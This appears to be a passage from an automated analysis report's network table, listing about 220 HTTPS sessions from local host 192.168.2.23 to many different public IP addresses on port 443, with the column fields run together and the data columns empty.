                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16129192.168.2.2345124138.208.132.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16130192.168.2.2360448159.223.58.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16131192.168.2.235622649.18.7.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16132192.168.2.235302044.185.164.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16133192.168.2.2348262173.10.113.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16134192.168.2.2343082211.116.110.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16135192.168.2.2351870220.143.23.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16136192.168.2.233989218.154.209.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16137192.168.2.2341650152.95.91.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16138192.168.2.2333488135.45.14.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16139192.168.2.2349902218.168.84.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16140192.168.2.2355904150.183.140.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16141192.168.2.235170648.138.254.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16142192.168.2.235274495.149.207.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16143192.168.2.2347600147.43.106.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16144192.168.2.2353070151.60.155.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16145192.168.2.234739090.107.135.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16146192.168.2.2333382181.72.145.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16147192.168.2.2354848101.31.48.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16148192.168.2.2340696108.22.14.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16149192.168.2.234788683.215.255.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16150192.168.2.2347336221.184.179.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16151192.168.2.2339574157.20.73.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16152192.168.2.23567024.207.85.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16153192.168.2.2346126184.139.239.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16154192.168.2.235628431.217.113.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16155192.168.2.235065091.148.223.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16156192.168.2.2343064125.240.221.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16157192.168.2.2352200223.48.40.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16158192.168.2.23459764.151.80.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16159192.168.2.2354528186.106.211.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16160192.168.2.233309667.132.47.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16161192.168.2.233319061.123.138.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16162192.168.2.2350048219.63.151.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16163192.168.2.2333608171.60.189.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16164192.168.2.2347294130.206.72.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16165192.168.2.2352164128.225.247.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16166192.168.2.234040846.84.73.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16167192.168.2.233747223.106.117.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16168192.168.2.2350852183.100.211.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16169192.168.2.235661057.159.188.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16170192.168.2.235790620.37.183.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16171192.168.2.234082679.133.150.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16172192.168.2.2354342124.178.179.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16173192.168.2.2345710159.110.201.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16174192.168.2.234600074.23.20.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16175192.168.2.2339882195.112.43.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16176192.168.2.236057675.227.128.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16177192.168.2.235691693.152.97.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16178192.168.2.23336145.210.89.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16179192.168.2.2346448159.104.65.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16180192.168.2.233956073.247.58.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16181192.168.2.234651234.52.37.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16182192.168.2.235217684.23.130.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16183192.168.2.235184496.88.166.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16184192.168.2.2357196178.105.14.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16185192.168.2.236067237.134.246.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16186192.168.2.2356380180.129.35.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16187192.168.2.2354842101.136.221.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16188192.168.2.235223246.58.193.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16189192.168.2.2347662139.7.109.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16190192.168.2.2349658115.203.9.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16191192.168.2.2359908134.156.214.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16192192.168.2.2339086121.172.219.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16193192.168.2.2344014210.205.207.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16194192.168.2.2352558217.90.236.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16195192.168.2.23521949.159.238.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16196192.168.2.2344182171.71.79.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16197192.168.2.2340242210.76.122.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16198192.168.2.2357352157.108.1.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16199192.168.2.234255212.27.100.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16200192.168.2.2341314163.74.209.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16201192.168.2.235825060.85.178.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16202192.168.2.2338488105.49.69.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16203192.168.2.2344820220.139.176.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16204192.168.2.2344326115.249.195.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16205192.168.2.2341026136.218.95.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16206192.168.2.2334156171.118.198.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16207192.168.2.233816434.219.234.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16208192.168.2.2340658148.4.190.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16209192.168.2.2351902173.78.169.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16210192.168.2.233339286.39.228.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16211192.168.2.2343950146.46.40.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16212192.168.2.236096277.228.209.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16213192.168.2.2344138148.197.140.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16214192.168.2.234329675.28.234.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16215192.168.2.2354912173.214.94.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16216192.168.2.233642667.159.213.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16217192.168.2.2356622103.247.112.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16218192.168.2.235349832.53.137.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16219192.168.2.23383564.196.140.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16220192.168.2.2353978177.126.30.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16221192.168.2.2359266112.199.213.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16222192.168.2.2358130181.108.37.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16223192.168.2.2334386104.203.79.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16224192.168.2.2350972105.144.119.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16225192.168.2.2346612201.157.79.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16226192.168.2.2343428204.136.245.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16227192.168.2.2351812140.139.216.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16228192.168.2.2347462142.248.128.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16229192.168.2.234662017.234.143.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16230192.168.2.233539698.101.240.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16231192.168.2.2345938129.212.116.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16232192.168.2.2355010156.226.252.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16233192.168.2.234588445.227.183.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16234192.168.2.234718853.152.132.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16235192.168.2.2332980198.3.0.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16236192.168.2.2333650169.24.82.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16237192.168.2.233392837.202.139.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16238192.168.2.233534841.156.245.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16239192.168.2.233611645.216.188.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16240192.168.2.2355272201.173.38.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16241192.168.2.2339868198.158.90.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16242192.168.2.235131880.99.48.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16243192.168.2.234351638.107.224.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16244192.168.2.2357160197.95.90.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16245192.168.2.2358598192.171.30.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16246192.168.2.2346778130.158.82.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16247192.168.2.235956417.178.9.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16248192.168.2.2360980177.11.57.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16249192.168.2.2356458140.63.94.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16250192.168.2.2343234135.53.64.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16251192.168.2.2332918168.34.93.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16252192.168.2.233317248.166.63.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16253192.168.2.2348122147.54.210.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16254192.168.2.235434480.58.172.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16255192.168.2.233918419.83.89.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16256192.168.2.234061238.230.136.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16257192.168.2.233439620.154.67.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16258192.168.2.235977476.247.40.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16259192.168.2.2351264165.10.207.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16260192.168.2.2333540208.55.98.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16261192.168.2.2339484176.242.39.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16262192.168.2.2348034159.144.208.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16263192.168.2.234953268.16.236.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16264192.168.2.2351290175.27.175.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16265192.168.2.234805687.7.180.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16266192.168.2.2353494174.119.237.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16267192.168.2.2341564125.24.142.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16268192.168.2.2339640222.209.217.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16269192.168.2.233510047.11.246.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16270192.168.2.233779682.31.233.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16271192.168.2.2358266174.80.152.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16272192.168.2.234515896.152.104.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16273192.168.2.2348392159.165.159.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16274192.168.2.2347550103.117.124.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16275192.168.2.2347460157.116.48.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16276192.168.2.2356658166.66.253.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16277192.168.2.234305217.105.93.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16278192.168.2.2349226178.67.24.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16279192.168.2.23590288.30.120.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16280192.168.2.2354750113.146.115.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16281192.168.2.2351862124.205.38.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16282192.168.2.2347562132.123.27.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16283192.168.2.2333996147.216.184.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16284192.168.2.2343836150.113.108.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16285192.168.2.234818276.144.132.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16286192.168.2.2339294191.156.123.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16287192.168.2.234011646.9.97.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16288192.168.2.233576614.48.225.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16289192.168.2.2344346194.107.190.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16290192.168.2.233987617.137.114.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16291192.168.2.235375443.28.205.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16292192.168.2.2340784178.142.57.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16293192.168.2.2354842130.0.114.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16294192.168.2.2347314128.170.187.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16295192.168.2.234823066.214.106.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16296192.168.2.2345376210.143.129.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16297192.168.2.2335674209.143.175.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16298192.168.2.236022282.14.172.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16299192.168.2.2356278219.148.152.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16300192.168.2.234650274.143.20.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16301192.168.2.2335872119.128.11.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16302192.168.2.233502645.142.249.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16303192.168.2.236079877.1.162.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16304192.168.2.2346276162.107.133.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16305192.168.2.233419625.139.239.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16306192.168.2.2356286173.193.200.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16307192.168.2.2333868131.108.12.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16308192.168.2.235512871.150.100.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16309192.168.2.235203841.67.73.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16310192.168.2.234393696.189.224.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16311192.168.2.235995468.81.168.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16312192.168.2.2358426107.236.83.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16313192.168.2.2349444101.119.12.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16314192.168.2.2339366125.252.225.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16315192.168.2.2351790166.137.69.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16316192.168.2.2339668171.132.120.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16317192.168.2.235912434.79.246.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16318192.168.2.233856089.139.98.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16319192.168.2.2346244154.126.211.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16320192.168.2.234171093.4.65.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16321192.168.2.234930047.25.112.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16322192.168.2.2333428145.35.91.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16323192.168.2.23567629.206.200.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16324192.168.2.2336140137.254.193.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16325192.168.2.2333518172.156.252.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16326192.168.2.2356576112.87.150.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16327192.168.2.2333102138.31.209.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16328192.168.2.233548066.158.118.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16329192.168.2.2335174116.89.163.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16330192.168.2.2360680130.157.143.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16331192.168.2.2338610158.61.193.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16332192.168.2.2347256175.94.184.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16333192.168.2.2359948190.9.91.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16334192.168.2.2348118199.92.25.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16335192.168.2.2339092188.119.109.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16336192.168.2.234748636.197.223.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16337192.168.2.2343520169.219.218.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16338192.168.2.2356918159.200.36.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16339192.168.2.235941485.248.251.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16340192.168.2.2340976152.24.244.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16341192.168.2.2352808182.214.154.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16342192.168.2.23428029.33.159.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16343192.168.2.2340032194.234.202.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16344192.168.2.234722445.75.219.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16345192.168.2.2348156187.159.129.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16346192.168.2.235822640.25.82.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16347192.168.2.2343470100.175.95.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16348192.168.2.2351156216.25.97.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16349192.168.2.2353500182.19.227.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
